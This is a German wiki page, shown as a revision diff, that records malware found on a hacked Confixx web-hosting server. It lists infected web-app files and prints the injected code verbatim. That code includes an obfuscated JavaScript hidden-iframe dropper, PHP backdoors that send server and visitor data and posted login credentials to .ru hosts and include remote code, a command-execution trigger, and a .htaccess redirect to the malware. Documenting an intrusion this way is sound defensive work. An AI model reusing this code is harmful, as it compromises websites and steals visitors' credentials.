Hacked Confixx
Ago (Diskussion | Beiträge) |
Ago (Diskussion | Beiträge) |
||
| Zeile 28: | Zeile 28: | ||
| − | + | '''/home/www/confixx/html/webapps/weberp/index.de.html:''' | |
<syntaxhighlight lang="bash" style="font-size:9pt;"> | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
Version vom 10. September 2015, 11:48 Uhr
Hacked Confixx
login-6.hoststar.ch:
/home/www/confixx/html/webapps/zencart/index.de.html:
/home/www/confixx/html/webapps/xrms/index.de.html:
/home/www/confixx/html/webapps/xoops/index.de.html:
/home/www/confixx/html/webapps/xaraya/index.de.html:
/home/www/confixx/html/webapps/weberp/index.de.html:
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
/home/www/confixx/html/webapps/weberp/index.de.html:
<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>
/home/www/confixx/html/webapps/zencart/guest.php:
/home/www/confixx/html/webapps/xrms/configs.php:
/home/www/confixx/html/webapps/xoops/include.php:
/home/www/confixx/html/webapps/xaraya/date.php:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
open data from "user7.htmltags.ru"
/home/www/confixx/html/webapps/zencart/create.php:
/home/www/confixx/html/webapps/xrms/messages.php:
/home/www/confixx/html/webapps/xoops/includes.php:
/home/www/confixx/html/webapps/xaraya/report.php:
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
open data from "http://bis.iframe.ru/master.php?r_addr="
/home/www/confixx/html/webapps/zencart/.htaccess:
/home/www/confixx/html/webapps/xrms/.htaccess:
/home/www/confixx/html/webapps/xoops/.htaccess:
/home/www/confixx/html/webapps/xaraya/.htaccess:
Options -MultiViews ErrorDocument 404 //webapps/zencart/guest.php
allways force an 404 error and redirect to malware file
